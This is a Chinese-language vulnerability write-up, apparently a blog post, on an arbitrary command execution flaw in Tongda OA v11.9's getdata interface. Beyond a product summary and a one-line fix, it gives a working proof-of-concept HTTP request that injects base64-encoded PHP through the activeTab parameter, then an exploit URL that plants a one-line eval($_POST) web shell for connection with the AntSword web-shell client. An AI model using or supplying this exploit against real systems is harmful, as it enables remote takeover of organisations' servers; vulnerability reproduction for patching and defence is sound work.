通达OA v11.9 getdata任意命令执行漏洞复现+利用

1、产品简介

      通达OA(Office Anywhere网络智能办公系统)是由北京通达信科科技有限公司自主研发的协同办公自动化软件,是与中国企业管理实践相结合形成的综合管理办公平台。包括流程审批、行政办公、日常事务、数据统计分析、即时通讯、移动办公等,帮助广大用户降低沟通和管理成本,提升生产和决策效率。

2、漏洞概述

    通达OA v11.9 getdata接口存在任意命令执行漏洞,攻击者通过漏洞可以执行服务器任意命令控制服务器权限。

3、影响范围

     通达OA <= v11.9

4、复现环境

       Windows Server 2019搭建 通达OA v11.9 环境

     安装包下载地址:https://cdndown.tongda2000.com/oa/2019/TDOA11.9.exe

     下载后直接双击进行安装,然后设置访问地址和端口就安装好了

5、漏洞复现

    访问漏洞环境,burp抓包发送Repeater模块进行复现

POC

GET /general/appbuilder/web/portal/gateway/getdata?activeTab=%E5%27%19,1%3D%3Eeval(base64_decode(%22[base64加密的命令]%22)))%3B/*&id=19&module=Carouselimage HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=6nfieutt27f4d98vvp5029a472; KEY_RANDOMDATA=17755
Upgrade-Insecure-Requests: 1

 这里直接让他输出一个字符串  示例:echo test111111111111;

成功输出

6、漏洞利用 

构造exp

http://x.x.x.x:x/general/appbuilder/web/portal/gateway/getdata?activeTab=%E5%27%19,1%3D%3Eeval($_POST[a]))%3B/*&id=19&module=Carouselimage

直接编写一句话马子 使用中国蚁剑进行连接

 7、漏洞修复

     升级至安全版本。